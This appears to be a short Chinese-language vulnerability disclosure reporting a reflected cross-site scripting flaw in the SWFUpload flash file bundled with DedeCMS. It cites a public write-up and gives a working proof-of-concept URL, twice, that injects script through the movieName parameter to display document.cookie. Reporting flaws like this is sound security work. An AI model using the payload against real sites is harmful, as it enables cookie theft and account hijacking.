|
详细说明: Location: /uploads/images/swfupload/swfupload.swf
漏洞文件为:http://www.dedecms.com/images/swfupload/swfupload.swf
这个flash文件存在漏洞,此文件漏洞可参考:https://nealpoole.com/blog/2012/ ... swfupload-plupload/
构造XSS攻击
http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// 漏洞证明:http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

|